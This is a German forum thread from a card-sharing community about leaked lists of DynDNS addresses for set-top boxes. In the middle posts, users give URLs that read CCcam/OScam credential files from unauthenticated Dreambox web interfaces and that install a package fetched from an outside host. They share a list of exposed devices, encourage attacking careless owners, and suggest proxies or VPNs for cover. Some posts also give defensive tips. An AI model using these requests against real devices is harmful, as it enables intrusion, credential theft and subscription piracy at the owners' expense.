1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen

Talk Dydns Adressen im Internet

Dieses Thema im Forum "CS Allgemein" wurde erstellt von wylly31, 31. Oktober 2013.

  1. wylly31
    Offline

    wylly31 Elite Lord Supporter

    Registriert:
    11. Juli 2009
    Beiträge:
    3.331
    Zustimmungen:
    1.863
    Punkte für Erfolge:
    113
    Ort:
    Hell
    Hallo Leute.

    Es gab vor längerer Zeit mal verschiedene Seiten auf denen Clines also die Dynds Adressen tausender Leute zu finden waren. Mich würde interessieren ob es solche Seiten bzw. Listen noch gibt. Will nur sicher gehen das meine Adressen da nicht auch mittlerweile gelistet sind.
    Mann kann ja nie wissen. :)
     
    #1
  2. phantom

    Nervigen User Advertisement

  3. mrwong
    Offline

    mrwong VIP

    Registriert:
    17. Januar 2009
    Beiträge:
    4.697
    Zustimmungen:
    2.306
    Punkte für Erfolge:
    113
    Ort:
    Frankenland
    AW: Dydns Adressen im Internet

    es gibt klar noch solche liste.

    google einfach mal deine dynaddy

    denn wenn sie auf einer liste ist hat sie sicher auch jemand irgendwo gepostet ;)

    ich google meine addy und die meiner sharepartner regelmäßig.

    und da findet man oft was
     
    #2
    HeinDumm und wylly31 gefällt das.
  4. wylly31
    Offline

    wylly31 Elite Lord Supporter

    Registriert:
    11. Juli 2009
    Beiträge:
    3.331
    Zustimmungen:
    1.863
    Punkte für Erfolge:
    113
    Ort:
    Hell
    AW: Dydns Adressen im Internet

    Meinst Du nur die eigene Dyndns oder bei Cline mit C: davor. Aber finde bei beidem Garnichts. Sehr gut! :)

    Hast Du denn mal eine Adresse wo es eine solche Liste gibt. Würde ich mir doch auch mal gerne ansehen.
     
    Zuletzt bearbeitet: 31. Oktober 2013
    #3
  5. mrwong
    Offline

    mrwong VIP

    Registriert:
    17. Januar 2009
    Beiträge:
    4.697
    Zustimmungen:
    2.306
    Punkte für Erfolge:
    113
    Ort:
    Frankenland
    AW: Dydns Adressen im Internet

    nur die dyndns kein c keine usernamen kein pw.

    solche liste gibt es ab und an mal in den boards oder man bekommt sie von anderen mitgleidern.

    im internen breich hier im board hab ich mir mal den spaß gemacht und einige line auf offene webif und ftps mit standart passwörter getestet da kraut es einem wirklich ca. 20 % mindestens offen. und von dort aus kann mit mit bischen kniff auch oscam dateien oder cccam schnappen. also ein teufelskreis.

    das problem ist !!!! leute die auf solch einer liste landen haben meistens wenig bis gar keinen plan und das ist erschreckenden.

    die kommen z.b hier ins deb machen ne anleitung für dummys mit wie cs das erste mal einzurichten ist. kümmern sich aber dann sonst um nichts mehr.

    DESWEGEN MAHNE ICH IMMER. mann soll sich belesen es bringt doch nichts wenn man einfach was macht und gar nicht weis was man dort getan hat ^^
     
    #4
    P007, Pilot, HeinDumm und 2 anderen gefällt das.
  6. night.knight
    Offline

    night.knight Hacker

    Registriert:
    14. Mai 2012
    Beiträge:
    425
    Zustimmungen:
    195
    Punkte für Erfolge:
    43
    Beruf:
    Programmierer
    AW: Dydns Adressen im Internet

    Ich würde jetzt auch 10 mal danke drücken wenn ich dürfte.
     
    #5
  7. wylly31
    Offline

    wylly31 Elite Lord Supporter

    Registriert:
    11. Juli 2009
    Beiträge:
    3.331
    Zustimmungen:
    1.863
    Punkte für Erfolge:
    113
    Ort:
    Hell
    AW: Dydns Adressen im Internet

    Aber wo hattest Du die Lines her die Du getestet hast?
     
    #6
  8. mrwong
    Offline

    mrwong VIP

    Registriert:
    17. Januar 2009
    Beiträge:
    4.697
    Zustimmungen:
    2.306
    Punkte für Erfolge:
    113
    Ort:
    Frankenland
    AW: Dydns Adressen im Internet

    so ich hab nun extra meine gefühlten 25 festplatten durchgeschaut.

    ich finde die scheis liste nicht mehr.

    hab sie aber bananbeck und czutok weitergeschickt das weis ich noch. einfach die 2 mal fragen.

    die liste war vom 13. Januer 13 das weis ich noch das hab ich im non public forum nachgelesen, weil ich da terror geschoben habe. liste hatte ca. 16 000 adressen und war in 4 teile zerlegt. von türkei bis schwenden alles dabei :)

    aber für alle die mal wissen wollen wie man von einem webif einer dreambox cccam.cfg rippt oder oscam umschreiben und rippen.

    hier mal der code.

    es reicht wenn das webif über inet erreichbar ist man brauch kein user name und pw es muss nur eine portweiterleitung haben. ist ja so sonst würde man es nicht sehen ^^

    Code:
    http://ipderbox/file?file=/etc/CCcam.cfg (oder pfad für oscam.server oder .user anpassen. liegt ja nach image wo anders )   
    
    ist keine große kunst.


    ach ja noch paar tipps.

    1. shared nicht mit leuten die wenig beiträge haben und standartports wie 12 000 nutzen.

    2. ladet keine ominösen programme von irgendwelchen boards die es erleichtern config oder co zu pflegen. oder zum streamen einalden ( so wurde die line von meinem onkel gehackt. hatte ich auch hier mal im Non Plubic teil des Boards angesprochen)

    3. regelmäßige kontrollen.
     
    #7
    wylly31, HeinDumm und Skyrider79 gefällt das.
  9. wylly31
    Offline

    wylly31 Elite Lord Supporter

    Registriert:
    11. Juli 2009
    Beiträge:
    3.331
    Zustimmungen:
    1.863
    Punkte für Erfolge:
    113
    Ort:
    Hell
    AW: Dydns Adressen im Internet

    Echt interessant. Ich bin der Meinung man sollte mit niemanden teilen. Einfach ein eigenes kleines CS Netzwerk aufbauen mit lokalen Karten und nur unter Freunden. Alles andere wäre mir zu unsicher.
     
    #8
  10. mrwong
    Offline

    mrwong VIP

    Registriert:
    17. Januar 2009
    Beiträge:
    4.697
    Zustimmungen:
    2.306
    Punkte für Erfolge:
    113
    Ort:
    Frankenland
    AW: Dydns Adressen im Internet

    ja aber alle abos kann man sich nicht besorgen. also ich wöllte nicht auf sky it verzichten oder jsc sport.

    mtv hd+ sky orf srg habe ich selbst lokal.

    aber dann noch geld für die anderen abos ausgeben ne danke
     
    #9
  11. janni1
    Offline

    janni1 Moderator Digital Eliteboard Team

    Registriert:
    3. Mai 2010
    Beiträge:
    4.946
    Zustimmungen:
    5.865
    Punkte für Erfolge:
    113
    AW: Dydns Adressen im Internet

    man könnte unter anderm auch Pakete installieren und damit auch Dateien austauschen etc.
    Code:
    http://ipderbox/ipkg?command=install&package=http://www.adresse.com/paket.ipk
    Wenn das WebIf mit einem Passwort geschütz ist, sollten diese "Tricks" aber nicht mehr funktionieren.

    Hier mal die Datei mit den Adressen von damals:

    Dieser Link ist nur für Mitglieder!!! Jetzt kostenlos Registrieren ?



    Solche Listen gibts noch zu Hauf im Internet auch aktuelle!

    Also
    sichere Passwörter eintragen,
    nur die absolut nötigsten Port auf machen
    und dafür keine Standartports benutzen!

    Gruß
    janni1
     
    Zuletzt bearbeitet: 1. November 2013
    #10
    Skyrider79 und mrwong gefällt das.
  12. mrwong
    Offline

    mrwong VIP

    Registriert:
    17. Januar 2009
    Beiträge:
    4.697
    Zustimmungen:
    2.306
    Punkte für Erfolge:
    113
    Ort:
    Frankenland
    AW: Dydns Adressen im Internet

    Code:
    [URL]http://ipderbox/ipkg?command=install&package=http://www.adresse.com/paket.ipk[/URL]
    gg ich wollte ein paar spielerrei für mich behalten aber gut wer sein webif ohne pw schützt dem gehört es auch nicht anders ;)


    allen die mit der liste spielen rate ich socket 5 proxie oder vpn ;)
     
    #11
  13. wylly31
    Offline

    wylly31 Elite Lord Supporter

    Registriert:
    11. Juli 2009
    Beiträge:
    3.331
    Zustimmungen:
    1.863
    Punkte für Erfolge:
    113
    Ort:
    Hell
    AW: Dydns Adressen im Internet

     
    #12
  14. janni1
    Offline

    janni1 Moderator Digital Eliteboard Team

    Registriert:
    3. Mai 2010
    Beiträge:
    4.946
    Zustimmungen:
    5.865
    Punkte für Erfolge:
    113
    AW: Dydns Adressen im Internet

    Hi,
    da gibt es noch .zig andere commands. Ist kein Geheimnis.
    Das ist ein Feature des WebIfs und ist auch so gewollt von den Devs zum updaten und verwalten der dream übers Netzwerk.
    wen es interessiert hier mal was zum lesen

    Dieser Link ist nur für Mitglieder!!! Jetzt kostenlos Registrieren ?



    naja die Liste von mir ist glaub ich von Feb. 2012 und beinhaltet die Adressen der damals "gehackten/veröffentlichten" offenen Server.
    Ich hoffe ja mal, dass davon nun keiner mehr so dumm ist und wenn doch.... Pech gehabt.:emoticon-0122-itwas

    Gruß
    janni1
     
    #13
    mrwong gefällt das.
  15. mrwong
    Offline

    mrwong VIP

    Registriert:
    17. Januar 2009
    Beiträge:
    4.697
    Zustimmungen:
    2.306
    Punkte für Erfolge:
    113
    Ort:
    Frankenland
    AW: Dydns Adressen im Internet

    hab mal kurz paar angepingt sind gleich login aufforderungen für webif kommen hab 3 probiert kein standartpasswort.

    aber wenn jemand spaß haben will bitte :p

    so ich muss nun auf den friedhof :)
     
    #14
  16. wylly31
    Offline

    wylly31 Elite Lord Supporter

    Registriert:
    11. Juli 2009
    Beiträge:
    3.331
    Zustimmungen:
    1.863
    Punkte für Erfolge:
    113
    Ort:
    Hell
    AW: Dydns Adressen im Internet

    Ja da kann man sich Stunden mit beschäftigen! :)
     
    #15

Diese Seite empfehlen